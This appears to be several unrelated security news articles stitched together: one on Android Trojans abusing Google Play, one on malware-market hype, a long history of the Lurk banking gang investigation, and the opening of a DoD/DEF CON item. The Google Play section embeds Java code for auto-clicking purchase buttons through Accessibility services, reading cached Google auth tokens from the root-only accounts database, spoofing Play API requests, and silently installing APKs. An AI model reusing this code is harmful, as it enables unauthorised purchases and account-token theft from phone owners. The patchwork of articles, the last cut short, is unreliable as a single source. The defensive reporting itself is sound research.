How Trojans manipulate Google Play

For malware writers, Google Play is the promised land of sorts. Once there, a malicious application gains access to a wide audience, wins that audience's trust, and enjoys a degree of leniency from the security systems built into operating systems. On mobile devices, users typically cannot install applications from sources other than the official store, so this is a serious barrier for an app with malicious intent. However, it is far from easy to get into Google Play: one of the main conditions is passing a rigorous check for unwanted behavior by different analysis systems, both automatic and manual. Some malware writers have given up trying to push their malicious creations past these security checks and have instead learned how to use the store's client app for their own unscrupulous gains. Lately, we have seen many Trojans use the Google Play app during promotion campaigns to download, install and launch apps on smartphones without the owners' knowledge, as well as to leave comments and rate apps.

The apps installed by the Trojan do not typically cause direct damage to the user, but the victim may have to pay for the excess traffic they generate.
In addition, the Trojans may download and install paid apps as if they were free ones, further adding to the user's bills. Let us look at how such manipulations of Google Play are carried out.

Level 1. N00b

The first method is to make the official Google Play client app carry out the actions the cybercriminal wants.

The idea is to have the Trojan launch the client, open the page of the required app in it, and then use special code to interact with the interface elements (buttons) so as to download, install and launch the application.
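
For illustration only, a minimal sketch of the first step -- opening a given app's page in the official Google Play client -- might look like the code below. The helper class and package handling are hypothetical and are not taken from any of the Trojans described here.

import android.content.Context;
import android.content.Intent;
import android.net.Uri;

// Hypothetical helper: opens an app's product page in the official Google Play client.
public class PlayPageOpener {
    public static void openAppPage(Context context, String packageName) {
        Intent intent = new Intent(Intent.ACTION_VIEW,
                Uri.parse("market://details?id=" + packageName));
        // Force the official Google Play client (com.android.vending) to handle the intent.
        intent.setPackage("com.android.vending");
        intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        context.startActivity(intent);
    }
}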

The exact methods of interaction with the interface vary.
In general, the following techniques may be identified:

- Use of the Accessibility services of the operating system (used by modules of Trojan.AndroidOS.Ztorg).
- Imitation of user input (used by Trojan-Clicker.AndroidOS.Gopl.c).
- Code injection into the process of the Google Play client to modify its operation (used by Trojan.AndroidOS.Iop).

To see how such Trojans operate, let us look at the example of Trojan.AndroidOS.Ztorg.n.

This malicious program uses Accessibility services originally intended to create applications to help people with disabilities, such as GUI voice control apps.

The Trojan receives a job from the command and control (C&C) server containing a link to the required application, opens the app's page in Google Play, and then launches code that detects when the required interface element appears on the screen and emulates a click on it.
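
As an illustration (and not the actual Ztorg code), a stripped-down AccessibilityService that waits for buttons with certain labels to appear and emulates clicks on them could look roughly like this; the button labels and class name are assumptions:

import android.accessibilityservice.AccessibilityService;
import android.view.accessibility.AccessibilityEvent;
import android.view.accessibility.AccessibilityNodeInfo;
import java.util.List;

// Illustrative sketch only: clicks through the Google Play purchase dialogs.
public class ClickerService extends AccessibilityService {
    private static final String[] TARGET_LABELS = {"INSTALL", "BUY", "ACCEPT", "CONTINUE"};

    @Override
    public void onAccessibilityEvent(AccessibilityEvent event) {
        AccessibilityNodeInfo root = getRootInActiveWindow();
        if (root == null) return;
        for (String label : TARGET_LABELS) {
            // Find visible nodes whose text matches one of the target labels...
            List<AccessibilityNodeInfo> nodes = root.findAccessibilityNodeInfosByText(label);
            for (AccessibilityNodeInfo node : nodes) {
                if (node.isClickable()) {
                    // ...and emulate a click on the first clickable match.
                    node.performAction(AccessibilityNodeInfo.ACTION_CLICK);
                    return;
                }
            }
        }
    }

    @Override
    public void onInterrupt() {
        // Nothing to clean up in this sketch.
    }
}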

In this way, the following buttons are clicked in sequence: "BUY" (the price is shown in the button), "ACCEPT" and "CONTINUE".

This is sufficient to purchase the app, provided the user has a credit card with sufficient balance linked to his/her Google account.

Level 2. Pro

Some malware writers take roads less traveled. Instead of using the easy and reliable way described above, they create their own client for the app store using the HTTPS API. The difficult part of this approach is that operating a self-made client requires information (e.g. user credentials and authentication tokens) that is not available to a regular app. However, the cybercriminals are very fortunate that all the required data are stored on the device in clear text, in the convenient SQLite format.

Access to the data is limited by the Android security model; however, Trojans can bypass this restriction, e.g. by rooting the device and thereby gaining unlimited access. For example, some versions of Trojan.AndroidOS.Guerrilla.a have their own client for Google Play, which is distributed with the help of the rooter Leech.

This client successfully fulfils the task of downloading and installing free and paid apps, and is capable of rating apps and leaving comments in the Google store. After launch, Guerrilla starts to collect the information it needs, beginning with the credentials to the user's Google Play account. Activities in Google Play require special tokens that are generated when the user logs in. When the user is already logged in to Google Play, the Trojan can use the locally cached tokens, which can be located through a simple search of the database at /data/system/users/0/accounts.db. The Trojan first checks whether ready-made tokens are present on the infected device, i.e. whether the user has logged in and can perform activities in Google Play; if no such tokens are available, it obtains the user's username and hashed password and authenticates via OAuth.
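
A rough sketch of such a token lookup is shown below. It assumes the process already has root access to read the system database, and the table and column names follow the stock Android AccountManager schema rather than anything recovered from Guerrilla itself.

import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;

// Hedged sketch: check for cached Google auth tokens in the system accounts database.
public class TokenLookup {
    private static final String ACCOUNTS_DB = "/data/system/users/0/accounts.db";

    public static boolean hasCachedGoogleTokens() {
        // Requires root: the accounts database is not readable by ordinary apps.
        SQLiteDatabase db = SQLiteDatabase.openDatabase(
                ACCOUNTS_DB, null, SQLiteDatabase.OPEN_READONLY);
        // Join accounts with their cached auth tokens, keeping Google accounts only.
        Cursor cursor = db.rawQuery(
                "SELECT a.name, t.type, t.authtoken "
                        + "FROM accounts a JOIN authtokens t ON t.accounts_id = a._id "
                        + "WHERE a.type = 'com.google'", null);
        boolean found = cursor.moveToFirst();
        cursor.close();
        db.close();
        return found;
    }
}
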
Guerrilla also collects a set of device identifiers: android_id, the device's unique ID; the Google Service Framework ID, the device's identifier across Google services, which the Trojan first attempts to obtain using regular methods and, if these fail, retrieves with its own code; and the Google Advertising ID, the unique advertising ID provided by Google Play services. In a similar way, the Trojan obtains hashed data about the device from the file "/data/data/com.google.android.gms/shared_prefs/Checkin.xml". When the Trojan has collected the above data, it begins to receive tasks to download and install apps.
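
For reference, the Google Advertising ID can be retrieved through the documented Play services API (the play-services-ads-identifier library); Guerrilla may well bind to the underlying service directly instead, so treat this snippet purely as an illustration of where the value comes from.

import android.content.Context;
import com.google.android.gms.ads.identifier.AdvertisingIdClient;

// Illustrative sketch: obtain the Google Advertising ID via the public API.
public class AdIdFetcher {
    // Must be called off the main thread; blocks while talking to Play services.
    public static String getAdvertisingId(Context context) throws Exception {
        AdvertisingIdClient.Info info = AdvertisingIdClient.getAdvertisingIdInfo(context);
        return info.getId();
    }
}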

The Trojan downloads the application by sending POST requests to the links below:

- https://android.clients.google.com/fdfe/search: a search is performed for the request sent by the cybercriminals. This request is needed to simulate the user's interaction with the Google Play client (the main scenario for installing apps from the official client presupposes that the user first performs a search and only then visits the app's page).
- https://android.clients.google.com/fdfe/details: with this request, additional information needed to download the app is collected.
- https://android.clients.google.com/fdfe/purchase: the token and purchase details used in the next request are downloaded.
- https://android.clients.google.com/fdfe/delivery: the Trojan receives the URL and the cookie files required to download the Android application package (APK) file.
- https://android.clients.google.com/fdfe/log: the download is confirmed (so that the download counter is incremented).
- https://android.clients.google.com/fdfe/addReview: the app is rated and a comment is added.

When creating the requests, the cybercriminals attempted to simulate the equivalent requests sent by the official client as accurately as possible; in particular, the same fixed set of HTTP headers is used in each request.
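
A simplified sketch of such a request is given below. The endpoint path comes from the list above, while the header values (the auth token format, user agent and content type) are approximations of what the official client sends, not values recovered from Guerrilla.

import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;

// Hedged sketch: POST a protobuf-encoded body to one of the Play "fdfe" endpoints.
public class FdfeClient {
    public static int post(String endpoint, String authToken, byte[] body) throws Exception {
        URL url = new URL("https://android.clients.google.com/fdfe/" + endpoint);
        HttpURLConnection conn = (HttpURLConnection) url.openConnection();
        conn.setRequestMethod("POST");
        conn.setDoOutput(true);
        // Headers imitating the official Google Play client (values are approximate).
        conn.setRequestProperty("Authorization", "GoogleLogin auth=" + authToken);
        conn.setRequestProperty("User-Agent", "Android-Finsky/7.1.15 (api=3,versionCode=80711500)");
        conn.setRequestProperty("Content-Type", "application/x-protobuf");
        try (OutputStream out = conn.getOutputStream()) {
            out.write(body);
        }
        return conn.getResponseCode(); // Responses are protobuf-encoded as well.
    }
}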

After the request is executed, the app may (optionally) be downloaded, installed (using the command 'pm install -r', which allows applications to be installed without the user's consent) and launched.
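
On a rooted device, the silent installation step boils down to a shell call along the following lines; the APK path is a placeholder.

// Minimal sketch, assuming root access: silently install a downloaded APK.
public class SilentInstaller {
    public static int installSilently(String apkPath) throws Exception {
        Process p = Runtime.getRuntime().exec(
                new String[]{"su", "-c", "pm install -r " + apkPath});
        // pm returns 0 on success; any other exit code indicates failure.
        return p.waitFor();
    }
}
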
Conclusion

The Trojans that use the Google Play app to download, install and launch apps from the store onto a smartphone without the device owner's consent are typically distributed by rooters – malicious programs that have already gained the highest possible privileges on the device. It is this particular fact that allows them to launch such attacks on the Google Play client app. This type of malicious program poses a serious threat: in Q2 2016, various rooters occupied more than half of the Top 20 mobile malware rating.

What is more, rooters can download not only malicious programs that compromise the Android ecosystem and spend the user's money on unnecessary paid apps, but any other malware as well.

Malware Markets: Exposing The Hype & Filtering The Noise

There's a lot of useful infosec information out there, but cutting through the clutter is harder than it should be. There is a wealth of genuine, educational information on the infosec industry available through the media, helping both the industry and the general public.

Then there are stories put forth by those who just want to get into the headlines for some quick recognition.

This makes it difficult for the tech audience to separate the signal from the noise. I have the perspective of over 20 years in the information security industry, and I’ve seen the cycle of hype continually chase its own tail. Over time, you start to recognize the patterns and learn to tell the difference between the genuine heroes who put out data for the greater good and the villains who are just generating hype. Those individuals and companies that go for the quick win with the press try to get their name associated with as many buzzwords as possible, but when you dig in, you find little to no substance.

There is no data behind many of their claims, they tend not to collaborate with the greater industry, and their overall goal seems to be to spread fear.   With the rise of vendors of all-things-evil on the “Dark Web,” ransomware (which isn’t really new), and other threats, the problem has gotten worse.

Take, for example, the hype surrounding a new ransomware offering, Stampado, being sold on the Dark Web. Once news broke of the cheap ransomware's availability, word quickly circulated. However, this just shows how attention is being diverted from real threats to unsophisticated, overhyped commodity malware. Stampado first appeared on the AlphaBay market priced attractively at $39. While that's an interesting footnote in the lengthy history of ransomware, it doesn't deserve the headlines.

There are several reasons for this.   First of all, there are other ransomware and ransomware-as-a-service offerings that are either free or cheaper. Many are available in the same market, and some are even more interesting from a code/malware research perspective. A second big issue is the sophistication level.
Stampado doesn’t have a truly automated payment mechanism.
It relies on sending email back and forth to get further instruction on decryption.

Beyond that, it's fully written/scripted in AutoIt, meaning it's easily deconstructed and simple to analyze without any advanced tools. All the code is right in front of you with a couple of clicks in Exe2Aut. Before press coverage around Stampado died down, there were multiple file decryption tools available to undo the changes it made.

And speaking of those changes, unlike many of the more destructive ransomware families, Stampado doesn’t affect all files on the disk or all disks on the system.
It targets specific files within the user profile directory of the current user.

Also, according to AlphaBay, only 55 individuals have actually purchased Stampado to date. There are already plenty of technical teardowns of Stampado, done by genuine researchers who want to dispel the hype.

But for every Stampado, there are thousands of other "scary-sounding" things waiting for the next new-company-on-the-block to exploit.

Malware Clearance Bins

Much of what you find in markets like AlphaBay and entry-level forums is old, cracked (that is, modified to run for free) copies of malware builders, cracked versions of packers/crypters, and even versions of gray- and black-hat tools (Havij Pro, license key generators, etc.) that are booby-trapped with back doors.

There is a lot of scammy, useless garbage out there.

One listing, which appears in several markets, is an outright scam: the site it links to (for its cut of the buyer's profits) is the Encryptor RaaS service, which no longer exists.

The issue of overhyped threats isn't specific to Dark Web markets and forums -- it's a trend that exists elsewhere in our industry.
It’s at a different level, but similar games are played with the release of flashy threat reports.

Almost daily, there is news of a recently discovered, state-sponsored, super-sophisticated advanced persistent threat campaign.
Some of these reports are valid and packed with vetted research.

And some are cut-and-paste jobs or technically inaccurate word salads, designed to grab headlines and notoriety.

Experts Must Help Sort Out The Hype

The bottom line is that the good guys need to do a better job of helping our customers and the general public spot the hype.

Those in the security industry must refrain from making a quick "press grab" and instead disseminate data that genuinely assists customers and the general public.

Building trust and becoming a source of valuable security information is only achieved over time.

There are no overnight heroes, and that needs to be accepted by everyone in the industry. I believe we’re on the right course.

Time and the market we exist in have a way of correcting these situations and allowing the valid, helpful entities in information security to rise to the top, while those spreading fear, uncertainty, and doubt eventually fade away. Jim Walter is a senior member of Cylance's SPEAR team. He focuses on next-level attacks, actors, and campaigns as well as 'underground' markets and associated criminal activity. Jim is a regular speaker at cybersecurity events and has authored numerous articles, whitepapers ...

The Hunt for Lurk

In early June, 2016, the Russian police arrested the alleged members of the criminal group known as Lurk.

The police suspected Lurk of stealing nearly three billion rubles, using malicious software to systematically withdraw large sums of money from the accounts of commercial organizations, including banks.

For Kaspersky Lab, these arrests marked the culmination of a six-year investigation by the company’s Computer Incidents Investigation team. We are pleased that the police authorities were able to put the wealth of information we accumulated to good use: to detain suspects and, most importantly, to put an end to the theft. We ourselves gained more knowledge from this investigation than from any other.

This article is an attempt to share this experience with other experts, particularly the IT security specialists in companies and financial institutions that increasingly find themselves the targets of cyber-attacks. When we first encountered Lurk, in 2011, it was a nameless Trojan.
It all started when we became aware of a number of incidents at several Russian banks that had resulted in the theft of large sums of money from customers.

To steal the money, the unknown criminals used a hidden malicious program that was able to interact automatically with the financial institution's remote banking service (RBS) software, replacing bank details in payment orders generated by an accountant at the attacked organization, or even generating such orders by itself. In 2016, it is hard to imagine banking software that does not demand some form of additional authentication, but things were different back in 2011.
In most cases, the attackers only had to infect the computer on which the RBS software was installed in order to start stealing the cash. Russia’s banking system, like those of many other countries, was unprepared for such attacks, and cybercriminals were quick to exploit the security gap. We participated in the investigation of several incidents involving the nameless malware, and sent samples to our malware analysts.

They created a signature to see if any other infections involving it had been registered, and discovered something very unusual: our internal malware naming system insisted that what we were looking at was a Trojan that could be used for many things (spamming, for example) but not for stealing money. In our detection systems, a program with a certain set of functions can sometimes be mistaken for something completely different.
In the case of this particular program the cause was slightly different: an investigation revealed that it had been detected by a “common” signature because it was doing nothing that could lead the system to include it in any specific group, for example, that of banking Trojans. Whatever the reason, the fact remained that the malicious program was used for the theft of money. So we decided to take a closer look at the malware.

The first attempts to understand how the program worked gave our analysts nothing. Regardless of whether it was launched on a virtual or a real machine, it behaved in the same way: it didn’t do anything.

This is how the program, and later the group behind it, got its name.

To “lurk” means to hide, generally with the intention of ambush. We were soon able to help investigate another incident involving Lurk.

This time we got a chance to explore the image of the attacked computer.

There, in addition to the familiar malicious program, we found a .dll file with which the main executable file could interact.

This was our first piece of evidence that Lurk had a modular structure. Later discoveries suggest that, in 2011, Lurk was still at an early stage of development.
It was formed of just two components, a number that would grow considerably over the coming years. The additional file we uncovered did little to clarify the nature of Lurk.
It was clear that it was a Trojan targeting RBS and that it was used in a relatively small number of incidents.
In 2011, attacks on such systems were starting to grow in popularity. Other, similar programs were already known about, the earliest detected as far back as 2006, with new malware appearing regularly since then.

These included ZeuS, SpyEye, Carberp and others.
In this series, Lurk represented yet another dangerous piece of malware. It was extremely difficult to make Lurk work in a lab environment. New versions of the program appeared only rarely, so we had few opportunities to investigate new incidents involving Lurk.

A combination of these factors influenced our decision to postpone our active investigation into this program and turn our attention to more urgent tasks.

A change of leader

For about a year after we first encountered Lurk, we heard little about it.
It later turned out that the incidents involving this malicious program were buried in the huge amount of similar incidents involving other malware.
In May 2011, the source code of ZeuS had been published on the Web and this resulted in the emergence of many program modifications developed by small groups of cybercriminals. In addition to ZeuS, there were a number of other unique financial malware programs.
In Russia, there were several relatively large cybercriminal groups engaged in financial theft via attacks on RBS.

Carberp was the most active among them.

At the end of March 2012, the majority of its members were arrested by the police.

This event significantly affected the Russian cybercriminal world as the gang had stolen hundreds of millions of rubles during a few years of activity, and was considered a “leader” among cybercriminals. However, by the time of the arrests, Carberp’s reputation as a major player was already waning.

There was a new challenger for the crown. A few weeks before the arrests, the sites of a number of major Russian media, such as the agency “RIA Novosti”, Gazeta.ru and others, had been subjected to a watering hole attack.

The unknown cybercriminals behind this attack distributed their malware by exploiting a vulnerability in the websites’ banner exchange system.

A visitor to the site would be redirected to a fraudulent page containing a Java exploit.
Successful exploitation of the vulnerability launched a malicious program whose main function was to collect information about the attacked computer, send it to a malicious server and, in some cases, receive and install an extra payload from the server.

The code on the main page of RIA.ru used to download additional content from AdFox.ru

From a technical perspective, the malicious program was unusual. Unlike most other malware, it left no traces on the hard drive of the attacked system and worked only in the machine's RAM.

This approach is not often used in malware, primarily because the resulting infection is "short-lived": the malware exists in the system only until the computer is restarted, at which point the process of infection needs to be started anew.

But, in the case of these attacks, the secret “bodiless” malicious program did not have to gain a foothold in the victim’s system.
Its primary job was to explore; its secondary role was to download and install additional malware.

Another fascinating detail was the fact that the malware was only downloaded in a small number of cases, when the victim computer turned out to be "interesting".

Part of the Lurk code responsible for downloading additional modules

Analysis of the bodiless malicious program showed that it was "interested" in computers with remote banking software installed – more specifically, RBS software created by Russian developers. Much later we learned that this unnamed, bodiless module was mini, one of the malicious programs which used Lurk.

But at the time we were not sure whether the Lurk we had known since 2011 and the Lurk discovered in 2012 were created by the same people. We had two hypotheses: either Lurk was a program written for sale, and the 2011 and 2012 versions were the work of two different groups that had each bought the program from the author; or the 2012 version was a modification of the previously known Trojan. The second hypothesis turned out to be correct.

Invisible war with banking software

A small digression. Remote banking systems consist of two main parts: the bank part and the client part.

The client part is a small program that allows the user (usually an accountant) to remotely manage their organization’s accounts.

There are only a few developers of such software in Russia, so any Russian organization that uses RBS relies on software developed by one of these companies.

For cybercriminal groups specializing in attacks on RBS, this limited range of options plays straight into their hands. In April 2013, a year after we found the “bodiless” Lurk module, the Russian cybercriminal underground exploited several families of malicious software that specialized in attacks on banking software.

Almost all operated in a similar way: during the exploration stage they found out whether the attacked computer had the necessary banking software installed.
If it did, the malware downloaded additional modules, including ones allowing for the automatic creation of unauthorized payment orders, changing details in legal payment orders, etc.

This level of automation became possible because the cybercriminals had thoroughly studied how the banking software operated and “tailored” their malicious software modules to a specific banking solution. The people behind the creation and distribution of Lurk had done exactly the same: studying the client component of the banking software and modifying their malware accordingly.
In fact, they created an illegal add-on to the legal RBS product. Through the information exchanges used by people in the security industry, we learned that several Russian banks were struggling with malicious programs created specifically to attack a particular type of legal banking software.
Some of them were having to release weekly patches to customers.

These updates would fix the immediate security problems, but the mysterious hackers “on the other side” would quickly release a new version of malware that bypassed the upgraded protection created by the authors of the banking programs. It should be understood that this type of work – reverse-engineering a professional banking product – cannot easily be undertaken by an amateur hacker.
In addition, the task is tedious and time-consuming and not the kind to be performed with great enthusiasm.
It would need a team of specialists.

But who in their right mind would openly take up illegal work, and who might have the money to finance such activities? In trying to answer these questions, we eventually came to the conclusion that every version of Lurk probably had an organized group of cybersecurity specialists behind it. The relative lull of 2011-2012 was followed by a steady increase in notifications of Lurk-based incidents resulting in the theft of money.

Due to the fact that affected organizations turned to us for help, we were able to collect ever more information about the malware.

By the end of 2013, the information obtained from studying hard drive images of attacked computers as well as data available from public sources, enabled us to build a rough picture of a group of Internet users who appeared to be associated with Lurk. This was not an easy task.

The people behind Lurk were pretty good at anonymizing their activity on the network.

For example, they were actively using encryption in everyday communication, as well as false data for domain registration, services for anonymous registration, etc.
In other words, it was not as easy as simply looking someone up on “Vkontakte” or Facebook using the name from Whois, which can happen with other, less professional groups of cybercriminals, such as Koobface.

The Lurk gang did not make such blunders. Yet mistakes, seemingly insignificant and rare, still occurred.

And when they did, we caught them. Not wishing to give away free lessons in how to run a conspiracy, I will not provide examples of these mistakes, but their analysis allowed us to build a pretty clear picture of the key characteristics of the gang. We realized that we were dealing with a group of about 15 people (although by the time it was shut down, the number of “regular” members had risen to 40).

This team provided the so-called “full cycle” of malware development, delivery and monetization – rather like a small, software development company.

At that time the “company” had two key “products”: the malicious program, Lurk, and a huge botnet of computers infected with it.

The malicious program had its own team of developers, responsible for developing new functions, searching for ways to “interact” with RBS systems, providing stable performance and fulfilling other tasks.

They were supported by a team of testers who checked the program performance in different environments.

The botnet also had its own team (administrators, operators, money flow manager, and other partners working with the bots via the administration panel) who ensured the operation of the command and control (C&C) servers and protected them from detection and interception. Developing and maintaining this class of malicious software requires professionals and the leaders of the group hunted for them on job search sites.

Examples of such vacancies are covered in my article about Russian financial cybercrime.

The description of the vacancy did not mention the illegality of the work on offer.

At the interview, the “employer” would question candidates about their moral principles: applicants were told what kind of work they would be expected to do, and why.

Those who agreed got in. A fraudster has advertised a job vacancy for java / flash specialists on a popular Ukrainian website.

The job requirements include a good level of programming skills in Java, Flash, knowledge of JVM / AVM specifications, and others.

The organizer offers remote work and full employment with a salary of $2,500.
So, every morning, from Monday to Friday, people in different parts of Russia and Ukraine sat down in front of their computer and started to “work”.

The programmers “tuned” the functions of malware modifications, after which the testers carried out the necessary tests on the quality of the new product.

Then the team responsible for the botnet and for the operation of the malware modules and components uploaded the new version onto the command server, and the malicious software on botnet computers was automatically updated.

They also studied information sent from infected computers to find out whether they had access to RBS, how much money was deposited in clients’ accounts, etc. The money flow manager, responsible for transferring the stolen money into the accounts of money mules, would press the button on the botnet control panel and send hundreds of thousands of rubles to accounts that the “drop project” managers had prepared in advance.
In many cases they didn’t even need to press the button: the malicious program substituted the details of the payment order generated by the accountant, and the money went directly to the accounts of the cybercriminals and on to the bank cards of the money mules, who cashed it via ATMs, handed it over to the money mule manager who, in turn, delivered it to the head of the organization.

The head would then allocate the money according to the needs of the organization: paying a “salary” to the employees and a share to associates, funding the maintenance of the expensive network infrastructure, and of course, satisfying their own needs.

This cycle was repeated several times.

Each member of the typical criminal group has their own responsibilities.

These were the golden years for Lurk.

The shortcomings in RBS transaction protection meant that stealing money from a victim organization through an accountant’s infected machine did not require any special skills and could even be automated.

But all "good things" must come to an end.

The end of "auto money flow" and the beginning of hard times

The explosive growth of thefts committed by Lurk and other cybercriminal groups forced banks, their IT security teams and banking software developers to respond. First of all, the developers of RBS software blocked public access to their products.

Before the appearance of financial cybercriminal gangs, any user could download a demo version of the program from the manufacturer’s website.

Attackers used this to study the features of banking software in order to create ever more tailored malicious programs for it.

Finally, after many months of “invisible war” with cybercriminals, the majority of RBS software vendors succeeded in perfecting the security of their products. At the same time, the banks started to implement dedicated technologies to counter the so-called “auto money flow”, the procedure which allowed the attackers to use malware to modify the payment order and steal money automatically. By the end of 2013, we had thoroughly explored the activity of Lurk and collected considerable information about the malware.

At our farm of bots, we could finally launch a consistently functioning malicious script, which allowed us to learn about all the modifications cybercriminals had introduced into the latest versions of the program. Our team of analysts had also made progress: by the year’s end we had a clear insight into how the malware worked, what it comprised and what optional modules it had in its arsenal. Most of this information came from the analysis of incidents caused by Lurk-based attacks. We were simultaneously providing technical consultancy to the law enforcement agencies investigating the activities of this gang. It was clear that the cybercriminals were trying to counteract the changes introduced in banking and IT security.

For example, once the banking software vendors stopped providing demo versions of their programs for public access, the members of the criminal group established a shell company to receive directly any updated versions of the RBS software. Thefts declined as a result of improvements in the security of banking software, and the “auto money flow” became less effective.

As far as we can judge from the data we have, in 2014 the criminal group behind Lurk seriously reduced its activity and “lived from hand to mouth”, attacking anyone they could, including ordinary users.

Even if an attack could bring in no more than a few tens of thousands of rubles, they would still stoop to it. In our opinion, this was caused by economic factors: by that time, the criminal group had an extensive and extremely costly network infrastructure, so, in addition to employees' salaries, it was necessary to pay for renting servers, VPNs and other technical tools. Our estimates suggest that the network infrastructure alone cost the Lurk managers tens of thousands of dollars per month.

Attempts to come back

In addition to increasing the number of "minor" attacks, the cybercriminals were trying to solve their cash flow problem by "diversifying" the business and expanding their field of activity.

This included developing, maintaining and renting the Angler exploit pack (also known as XXX).
Initially, this was used mainly to deliver Lurk to victims’ computers.

But as the number of successful attacks started to decline, the owners began to offer smaller groups paid access to the tools. By the way, judging by what we saw on Russian underground forums for cybercriminals, the Lurk gang had an almost legendary status.

Even though many small and medium-sized groups were willing to “work” with them, they always preferred to work by themselves.
So when Lurk provided other cybercriminals with access to Angler, the exploit pack became especially popular – a “product” from the top underground authority did not need advertising.
In addition, the exploit pack was actually very effective, delivering a very high percentage of successful vulnerability exploitations.
It didn’t take long for it to become one of the key tools on the criminal2criminal market. As for extending the field of activity, the Lurk gang decided to focus on the customers of major Russian banks and the banks themselves, whereas previously they had chosen smaller targets. In the second half of 2014, we spotted familiar pseudonyms of Internet users on underground forums inviting specialists to cooperate on document fraud.

Early the following year, several Russian cities were swamped with announcements about fraudsters who used fake letters of attorney to re-issue SIM cards without their owners being aware of it. The purpose of this activity was to gain access to one-time passwords sent by the bank to the user so that they could confirm their financial transaction in the online or remote banking system.

The attackers exploited the fact that, in remote areas, mobile operators did not always carefully check the authenticity of the documents submitted and released new SIM cards at the request of cybercriminals. Lurk would infect a computer, collect its owner’s personal data, generate a fake letter of attorney with the help of “partners” from forums and then request a new SIM card from the network operator. Once the cybercriminals received a new SIM card, they immediately withdrew all the money from the victim’s account and disappeared. Although initially this scheme yielded good returns, this didn’t last long, since by then many banks had already implemented protection mechanisms to track changes in the unique SIM card number.
In addition, the SIM card-based campaign forced some members of the group and their partners out into the open, which helped law enforcement agencies to find and identify suspects. Alongside the attempts to "diversify" the business and find new cracks in the defenses of financial organizations, Lurk continued to regularly perform "minor thefts" using the proven auto money flow method. However, the cybercriminals were already planning to earn their main money elsewhere.

New "specialists"

In February 2015, Kaspersky Lab's Global Research and Analysis Team (GReAT) released its research into the Carbanak campaign targeting financial institutions.

Carbanak’s key feature, which distinguished it from “classical” financial cybercriminals, was the participation of professionals in the Carbanak team, providing deep knowledge of the target bank’s IT infrastructure, its daily routine and the employees who had access to the software used to conduct financial transactions.

Before any attack, Carbanak carefully studied the target, searched for weak points and then, at a certain moment in time, committed the theft in no more than a few hours.

As it turned out, Carbanak was not the only group applying this method of attack.
In 2015, the Lurk team hired similar experts.

How the Carbanak group operated

We realized this when we found incidents that resembled Carbanak in style, but did not use any of its tools.

This was Lurk.

The Lurk malware was used as a reliable “back door” to the infrastructure of the attacked organization rather than as a tool to steal money.

Although the functionality that had previously allowed for the near-automatic theft of millions no longer worked, in terms of its secrecy Lurk was still an extremely dangerous and professionally developed piece of malware. However, despite its attempts to develop new types of attacks, Lurk’s days were numbered.

Thefts continued until the spring of 2016.

But, either because of an unshakable confidence in their own impunity or because of apathy, day-by-day the cybercriminals were paying less attention to the anonymity of their actions.

They became especially careless when cashing money: according to our incident analysis, during the last stage of their activity, the cybercriminals used just a few shell companies to deposit the stolen money.

But none of that mattered any more as both we and the police had collected enough material to arrest suspected group members, which happened early in June this year.

No one on the Internet knows you are a cybercriminal?

My personal experience of the Lurk investigation made me think that the members of this group were convinced they would never be caught.

They had grounds to be that presumptuous: they were very thorough in concealing the traces of their illegal activity, and generally tried to plan the details of their actions with care. However, like all people, they made mistakes.

These errors accumulated over the years and eventually made it possible to put a stop to their activity.
In other words, although it is easier to hide evidence on the Internet, some traces cannot be hidden, and eventually a professional team of investigators will find a way to read and understand them. Lurk is neither the first nor the last example to prove this.

The infamous banking Trojan SpyEye was used to steal money between 2009 and 2011.
Its alleged creator was arrested in 2013 and convicted in 2014. The first attacks involving the banking Trojan Carberp began in 2010; the members of the group suspected of creating and distributing this Trojan were arrested in 2012 and convicted in 2014.

The list goes on. The history of these and other cybercriminal groups spans the time when everyone (and members of the groups in particular) believed that they were invulnerable and the police could do nothing.

The results have proved them wrong. Unfortunately, Lurk is not the last group of cybercriminals attacking companies for financial gain. We know about some other groups targeting organizations in Russia and abroad.

For these reasons, we recommend that all organizations do the following:

- If your organization is attacked by hackers, immediately call the police and involve experts in digital forensics. The earlier you go to the police, the more evidence the forensic experts will be able to collect, and the more information the law enforcement officers will have to catch the criminals.
- Apply strict IT security policies to the terminals from which financial transactions are made and to the employees working with them.
- Teach all employees who have access to the corporate network the rules of safe online behavior.

Compliance with these rules will not completely eliminate the risk of financial attacks, but it will make things harder for fraudsters and significantly increase the probability of their making a mistake while trying to overcome these obstacles.

And this will help law enforcement agencies and IT security experts in their work.

P.S.: why does it take so long?

Law enforcement agencies and IT security experts are often accused of inactivity, allowing hackers to remain at large and evade punishment despite the enormous damage caused to the victims. The story of Lurk proves the opposite.
In addition, it gives some idea of the amount of work that has to be done to obtain enough evidence to arrest and prosecute suspects. Unfortunately, the rules of the “game” are not the same for all participants: the Lurk group used a professional approach to organizing a cybercriminal enterprise, but, for obvious reasons, did not find it necessary to abide by the law.

As we work with law enforcement, we must respect the law.

This can be a long process, primarily because of the large number of “paper” procedures and restrictions that the law imposes on the types of information we as a commercial organization can work with. Our cooperation with law enforcement in investigating the activity of this group can be described as a multi-stage data exchange. We provided the intermediate results of our work to the police officers; they studied them to understand if the results of our investigation matched the results of their research.

Then we got back our data “enriched” with the information from the law enforcement agencies. Of course, it was not all the information they could find; but it was the part which, by law, we had the right to work with.

This process was repeated many times until we finally got a complete picture of Lurk's activity. However, that was not the end of the case. A large part of our work with law enforcement agencies was devoted to "translating" the information we had obtained from "technical" into "legal" language.

This ensured that the results of our investigation could be described in such a way that they were clear to the judge.

This is a complicated and laborious process, but it is the only way to bring to justice the perpetrators of cybercrimes.

DoD Taps DEF CON Hacker Traits For Cybersecurity Training Program

Famed capture-the-packet contest technology will become part of DoD training as well. The Defense Department for the second year in a row sent one of its top directors to DEF CON in Las Vegas this month, but it wasn’t for recruiting purposes. So what was Frank DiGiovanni, director of force training in DoD’s Office of the Assistant Secretary of Defense for Readiness, doing at DEF CON? “My purpose was to really learn from people who come to DEF CON … Who are they? How do I understand who they are? What motivates them? What sort of attributes” are valuable to the field, the former Air Force officer and pilot who heads overall training policy for the military, says. DiGiovanni interviewed more than 20 different security industry experts and executives during DEF CON. His main question:  “If you’re going to hire someone to either replace you or eventually be your next cyber Jedi, what are you looking for?” The DEF CON research is part of DiGiovanni’s mission to develop a state-of-the-art cyber training program that ultimately helps staff the military as well as private industry with the best possible cybersecurity experts and to fill the infamous cybersecurity skills gap today.

